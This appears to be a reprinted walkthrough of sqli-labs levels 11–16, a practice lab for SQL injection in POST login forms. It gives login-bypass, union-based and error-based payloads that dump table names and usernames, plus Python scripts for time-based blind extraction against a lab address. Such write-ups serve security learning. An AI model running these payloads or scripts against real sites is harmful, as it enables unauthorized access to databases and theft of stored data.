sqli-labs(3)

11.

Seeing a login form, try or 1=1 directly.

In HackBar we can see that the data here is sent by POST. In the GET levels we used --+ to comment out the rest of the query, because in a URL the # character is the fragment delimiter: the browser keeps everything after it for itself and never sends it to the server. -- starts a MySQL comment and + is the URL encoding of the space MySQL requires after --. In a POST body # is sent intact, so here we simply use #.
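To make that GET-versus-POST point concrete, here is an added example (not from the original page) that reproduces with Python's urllib what the server actually receives in each case and what SQL the vulnerable page would then build. The lab URL and the Less-11 style query string are assumptions for the illustration.

```python
from urllib.parse import parse_qs, urlencode, urlsplit


def get_param(url, name):
    """Return what the server receives for GET parameter `name`.

    urlsplit() splits off the fragment exactly as a browser does: everything
    after '#' stays client-side. parse_qs() then URL-decodes the query, so
    '+' becomes a space and '%23' becomes a literal '#'.
    """
    parts = urlsplit(url)
    return parse_qs(parts.query, keep_blank_values=True).get(name, [""])[0]


def post_param(fields, name):
    """Return what the server receives for a form field sent as
    application/x-www-form-urlencoded (how HackBar or requests.post send it).
    urlencode() percent-encodes '#' as %23 and the server decodes it back."""
    body = urlencode(fields)
    return parse_qs(body, keep_blank_values=True)[name][0]


def build_query(uname, passwd):
    """Paste the received values into the SQL text the way the login levels do
    (assumed Less-11 query shape)."""
    return (f"SELECT username, password FROM users "
            f"WHERE username='{uname}' and password='{passwd}' LIMIT 0,1")
```

With the GET URL ...?id=1' or 1=1 # the server sees 1' or 1=1 and the trailing quote of the original query is left dangling; with --+ it sees 1' or 1=1 -- and the comment works; with %23 the hash does arrive, which is the other way to use # in a GET level. In the POST body the # survives as typed and build_query() shows the rest of the statement commented out.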

After that it is the same as the GET case.

1' order by 2 #

order by 3 gives an error, so the query returns two columns.

Union-based injection

1' union select 1,2 #

1' union select database(),2#

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #

1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'#

1' union select 1,group_concat(username) from security.users #
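The procedure above (probe the column count with order by, then read the schema and the data with union select) is easy to reproduce offline. The following is an added example, not code from the page or from sqli-labs: it builds the Less-11 style query by string concatenation against an in-memory SQLite database (so the comment is -- instead of MySQL's #, and the schema comes from sqlite_master instead of information_schema) and puts the parameterized version beside it. The users rows are constructed sample data.

```python
import sqlite3

# Constructed sample rows standing in for sqli-labs' security.users table.
SAMPLE_USERS = [("Dumb", "Dumb"), ("Angelina", "I-kill-you"), ("admin", "admin")]


def make_db():
    """In-memory SQLite database with a users(id, username, password) table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users(username, password) VALUES (?, ?)", SAMPLE_USERS)
    return con


def login_vulnerable(con, uname, passwd):
    """Same shape as the Less-11 query: the POST fields are pasted into the SQL text.
    SQLite comments with -- (MySQL also accepts #), so the payloads end in '-- '."""
    sql = (f"SELECT username, password FROM users "
           f"WHERE username='{uname}' AND password='{passwd}' LIMIT 1")
    return con.execute(sql).fetchone()


def login_safe(con, uname, passwd):
    """Same query with bound parameters: the driver sends the values separately,
    so quotes, comments and UNION in the input are just characters of a name."""
    sql = "SELECT username, password FROM users WHERE username=? AND password=? LIMIT 1"
    return con.execute(sql, (uname, passwd)).fetchone()


def column_count(con, max_cols=10):
    """The page's 'order by N' probe: the first N that errors is one past the column count."""
    for n in range(1, max_cols + 1):
        try:
            login_vulnerable(con, f"1' order by {n} -- ", "x")
        except sqlite3.OperationalError:
            return n - 1
    return None


def dump_schema(con):
    """The page's union step, with information_schema replaced by SQLite's sqlite_master."""
    return login_vulnerable(con, "1' union select name, sql from sqlite_master -- ", "x")
```

login_vulnerable() accepts 1' or 1=1 -- as a login, reports two columns through column_count(), echoes 1,2 for the union probe and hands back the CREATE TABLE statement; login_safe() rejects the same strings and only matches a real username/password pair.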

12.

1' gets no reaction, so try a double quote instead: 1"

1" produces an error, and the message shows that a closing ) is also needed.

1") or 1=1 #

After that it is the same as before.

1") union select 1,2 #

1") union select 1,database() #

1") union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #

1") union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'#

1") union select 1,group_concat(username) from security.users #

13.

Trying 1' produces an error, and the message shows that the closing is ').

A correct login shows the success message but no data is echoed back; database error messages are displayed, however, so we use error-based injection. Two error-based methods are used here: extractvalue() and updatexml(). Both raise an XPATH syntax error whose message contains our string, but the message holds at most 32 characters, so long results (a group_concat() of all usernames, for example) have to be read in pieces with substr().

1') and extractvalue(1,concat(0x5c,database()))#

1') and updatexml(1,concat(0x7e,database(),0x7e),1) #

Extract the table names:

1') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#
1') and extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security')))#

Extract the column names:

1') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#
1') and extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))#

Extract the data:

1') and updatexml(1,concat(0x7e,(select group_concat(username) from security.users),0x7e),1)#
1') and extractvalue(1,concat(0x5c,(select group_concat(username) from security.users)))#

14.

Testing the input fields, 1" or 1=1 # logs in successfully.

Use error-based injection.

1" and updatexml(1,concat(0x7e,database(),0x7e),1)#
1" and extractvalue(1,concat(0x5c,database()))#

That gives the database name.

1" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#
1" and extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security')))#

That gives the table names.

1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#
1" and extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))#

That gives the column names.

1" and updatexml(1,concat(0x7e,(select group_concat(username) from security.users),0x7e),1)#
1" and extractvalue(1,concat(0x5c,(select group_concat(username) from security.users)))#
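Both error-based levels (13 and 14) run into the same practical limit: the XPATH error message carries at most 32 characters of our string, so a group_concat() of every username is cut off. The following added example (not code from the original page) parses the error text out of a response and pages through a long result with successive substr() windows. fake_server() is a constructed stand-in for the vulnerable page so the code runs offline; the prefixes "1') and " and '1" and ' are the ones this page uses for Less-13 and Less-14.

```python
import re

# MySQL's XPATH syntax error (raised by extractvalue()/updatexml()) echoes the
# offending string, truncated to 32 characters.
XPATH_ERROR = re.compile(r"XPATH syntax error: '([^']*)'")
WINDOW = 31  # 32-character limit minus the leading '~' delimiter


def parse_xpath_error(html):
    """Pull the injected string out of an error page and strip the ~ delimiters.
    Returns None when the page contains no XPATH error."""
    m = XPATH_ERROR.search(html)
    if not m:
        return None
    return m.group(1).strip("~")


def error_payload(prefix, subquery, start):
    """updatexml() payload reading WINDOW characters of `subquery` from `start`.
    `prefix` closes the original string/parenthesis: "1') and " for Less-13,
    '1" and ' for Less-14."""
    return (f"{prefix}updatexml(1,concat(0x7e,substr(({subquery}),{start},{WINDOW}),0x7e),1)#")


def dump(prefix, subquery, send):
    """Read a result of any length by moving the substr() window forward.
    `send(payload)` returns the response body; it is passed in so the logic
    can be driven by requests.post against the lab or by fake_server() here."""
    result, start = "", 1
    while True:
        chunk = parse_xpath_error(send(error_payload(prefix, subquery, start)))
        if not chunk:
            break
        result += chunk
        if len(chunk) < WINDOW:  # a short window means we reached the end
            break
        start += WINDOW
    return result


def fake_server(secret):
    """Constructed stand-in for the vulnerable page: applies the substr() window
    to `secret` and renders MySQL's error text, truncated to 32 characters."""
    pat = re.compile(r"substr\(\(.*?\),(\d+),(\d+)\)")

    def send(payload):
        m = pat.search(payload)
        start, length = int(m.group(1)), int(m.group(2))
        s = "~" + secret[start - 1:start - 1 + length] + "~"
        return f"<html><body>XPATH syntax error: '{s[:32]}'</body></html>"

    return send
```

Against the lab, send would be lambda p: requests.post(url, data={"uname": p, "passwd": "x"}).text. The window is 31 and not 32 because the leading ~ takes one of the 32 characters; without it, the error text would be hard to tell apart from the surrounding page.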

15.

1' or 1=1# returns a successful login.

When the input is wrong the page only returns login failure, with no error message, so we use boolean-based blind injection.

Here we need the difference between and and or: with and both sides must be true for a row to match; with or one true side is enough. If we have not brute-forced any account and admin is not actually present in the username column, a payload starting with admin' and ... can never match a row, whatever the condition, so we can only use or: username='1' is false, the row matches exactly when our condition is true, and a match shows up as a successful login. From experience the first field of a login form is the one substituted into the username comparison.

admin' and (substr(database(),1,1)='s')#
1' or (substr(database(),1,1)='s')#

1' or (substr(database(),1,1)='a')#

Success and failure only differ in which image is returned, which is not an obvious feature for a script to key on (the image path in the HTML does differ, so a boolean script comparing response bodies would also work), so we write the script with sleep(), i.e. time-based blind injection. Note that with the or form the username='1' comparison is false for every row, so MySQL evaluates the if() for each row of the users table and the real delay is sleep() multiplied by the row count; the rsp_time > 2 threshold still works, a true guess just takes longer than two seconds.

import requests, time

def database():
    data_base = ''
    # no '_' or punctuation: a name containing them ends the loop early
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            # guess the next character of database(); a hit costs a sleep(2)
            payload = {
                "uname": f"1' or if(substr(database(),{len(data_base) + 1},1)='{char}',sleep(2),0)#",
                "passwd": "123456",
            }
            url = "http://192.168.1.200:86/Less-15/"
            start_time = time.time()
            rsp = requests.post(url, data=payload)
            end_time = time.time()
            rsp_time = end_time - start_time
            # print(f"elapsed: {rsp_time}")
            if rsp_time > 2:
                data_base += char
                print(f"database name: {data_base}")
                break
        else:
            # no character matched this position: the name is complete
            break
    return data_base

datas = database()
print(f"final database name: {datas}")

1' or if(substr((select group_concat(table_name) from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(5),0)#

import requests, time

def tablename():
    table_name = ''
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            # first table of the security schema, one character at a time
            payload = {
                "uname": f"1' or if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),{len(table_name) + 1},1)='{char}',sleep(2),0)#",
                "passwd": "123456",
            }
            url = "http://192.168.1.200:86/Less-15/"
            start_time = time.time()
            rsp = requests.post(url, data=payload)
            end_time = time.time()
            rsp_time = end_time - start_time
            if rsp_time > 2:
                table_name += char
                print(f"table name: {table_name}")
                break
        else:
            break
    return table_name

tables = tablename()
print(f"final table name: {tables}")

1' or if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i',sleep(5),0)#

import requests, time

def columnname():
    column_name = ''
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            # first column of security.users, one character at a time
            payload = {
                "uname": f"1' or if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),{len(column_name) + 1},1)='{char}',sleep(2),0)#",
                "passwd": "123456",
            }
            url = "http://192.168.1.200:86/Less-15/"
            start_time = time.time()
            rsp = requests.post(url, data=payload)
            end_time = time.time()
            rsp_time = end_time - start_time
            if rsp_time > 2:
                column_name += char
                print(f"column name: {column_name}")
                break
        else:
            break
    return column_name

columns = columnname()
print(f"final column name: {columns}")

1' or if(substr((select username from security.users limit 0,1),1,1)='d',sleep(5),0)#

import requests, time

def data():
    data = ''
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            # first username in security.users, one character at a time
            payload = {
                "uname": f"1' or if(substr((select username from security.users limit 0,1),{len(data) + 1},1)='{char}',sleep(2),0)#",
                "passwd": "123456",
            }
            url = "http://192.168.1.200:86/Less-15/"
            start_time = time.time()
            rsp = requests.post(url, data=payload)
            end_time = time.time()
            rsp_time = end_time - start_time
            if rsp_time > 2:
                data += char
                print(f"data: {data}")
                break
        else:
            break
    return data

datadata = data()
print(f"final data: {datadata}")

16.

Testing shows that 1") or 1=1 # logs in successfully, so the closing here is ").

1") or if(substr(database(),1,1)='s',sleep(5),0 )#

import requests, time

def dataname():
    data_name = ""
    chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"
    while True:
        for char in chart:
            # Less-16 closes the string with ") and compares with double quotes
            payload = {
                "uname": f'1") or if(substr(database(),{len(data_name) + 1},1)="{char}",sleep(2),0)#',
                "passwd": "123456",
            }
            url = "http://192.168.1.200:86/Less-16/"
            start_time = time.time()
            rsp = requests.post(url, data=payload)
            end_time = time.time()
            rsp_time = end_time - start_time
            if rsp_time > 2:
                data_name += char
                print(f"database: {data_name}")
                break
        else:
            break
    return data_name

datas = dataname()
print(f"final database name: {datas}")

1") or if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(5),0)#

import requests, time

def tablename():
    table_name = ""
    chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"
    while True:
        for char in chart:
            payload = {
                "uname": f'1") or if(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),{len(table_name) + 1},1)="{char}",sleep(2),0)#',
                "passwd": "123456",
            }
            url = "http://192.168.1.200:86/Less-16/"
            start_time = time.time()
            rsp = requests.post(url, data=payload)
            end_time = time.time()
            rsp_time = end_time - start_time
            if rsp_time > 2:
                table_name += char
                print(f"table name: {table_name}")
                break
        else:
            break
    return table_name

tables = tablename()
print(f"final table name: {tables}")

1") or if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i',sleep(5),0)#

import requests, time

def columnname():
    column_name = ""
    chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"
    while True:
        for char in chart:
            payload = {
                "uname": f'1") or if(substr((select column_name from information_schema.columns where table_schema="security" and table_name="users" limit 0,1),{len(column_name) + 1},1)="{char}",sleep(2),0)#',
                "passwd": "123456",
            }
            url = "http://192.168.1.200:86/Less-16/"
            start_time = time.time()
            rsp = requests.post(url, data=payload)
            end_time = time.time()
            rsp_time = end_time - start_time
            if rsp_time > 2:
                column_name += char
                print(f"field name: {column_name}")
                break
        else:
            break
    return column_name

columns = columnname()
print(f"final field name: {columns}")

1") or if(substr((select username from security.users limit 0,1),1,1)='d',sleep(5),0)#

import requests, time

def data():
    data = ""
    chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"
    while True:
        for char in chart:
            payload = {
                "uname": f'1") or if(substr((select username from security.users limit 0,1),{len(data) + 1},1)="{char}",sleep(2),0)#',
                "passwd": "123456",
            }
            url = "http://192.168.1.200:86/Less-16/"
            start_time = time.time()
            rsp = requests.post(url, data=payload)
            end_time = time.time()
            rsp_time = end_time - start_time
            if rsp_time > 2:
                data += char
                print(f"data: {data}")
                break
        else:
            break
    return data

datas = data()
print(f"final data: {datas}")

Final script, with the four probes above folded into one helper (same payloads, same timing check):

import requests, time

URL = "http://192.168.1.200:86/Less-16/"
CHART = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"


def extract(expr, label):
    """Time-based extraction of the SQL expression `expr`, one character per hit.
    Less-16 closes the string with ") and compares with double quotes."""
    value = ""
    while True:
        for char in CHART:
            payload = {
                "uname": f'1") or if(substr(({expr}),{len(value) + 1},1)="{char}",sleep(2),0)#',
                "passwd": "123456",
            }
            start_time = time.time()
            requests.post(URL, data=payload)
            rsp_time = time.time() - start_time
            if rsp_time > 2:
                value += char
                print(f"{label}: {value}")
                break
        else:
            # no character matched this position: the value is complete
            break
    return value


database = extract("database()", "database")
table = extract('select table_name from information_schema.tables where table_schema="security" limit 0,1', "table name")
column = extract('select column_name from information_schema.columns where table_schema="security" and table_name="users" limit 0,1', "field name")
datas = extract("select username from security.users limit 0,1", "data")
print(f"final: database={database}, table={table}, field={column}, data={datas}")

This article was contributed by an internet user; the views are the author's own and do not represent the position of this site. The site only provides storage space, does not own the content and bears no related legal responsibility. If reprinting, please cite the source: http://www.hqwc.cn/news/208002.html
